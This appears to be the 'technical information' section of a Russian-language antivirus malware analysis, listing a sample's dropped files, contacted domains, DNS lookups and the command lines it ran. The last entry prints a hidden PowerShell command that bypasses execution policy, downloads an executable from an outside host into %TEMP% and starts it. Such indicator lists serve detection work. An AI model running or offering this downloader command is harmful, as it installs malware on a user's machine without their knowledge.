Техническая информация
- http://directexe.com/ttc/new.exe как %temp%\lol.exe
- %TEMP%\35ee.tmp\new 3.bat
- %TEMP%\lol.exe
- %TEMP%\35ee.tmp\new 3.bat
- 'di###texe.com':80
- 'su####-smiles.com':80
- http://di###texe.com/Ttc/new.exe
- http://su####-smiles.com/
- DNS ASK di###texe.com
- DNS ASK su####-smiles.com
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\35EE.tmp\new 3.bat" "<Полный путь к файлу>""' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\35EE.tmp\new 3.bat" "<Полный путь к файлу>""
- '%WINDIR%\syswow64\cmd.exe' ,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://directexe.com/Ttc/new.exe','%TEMP%\lol.exe');Start-Process %TEMP...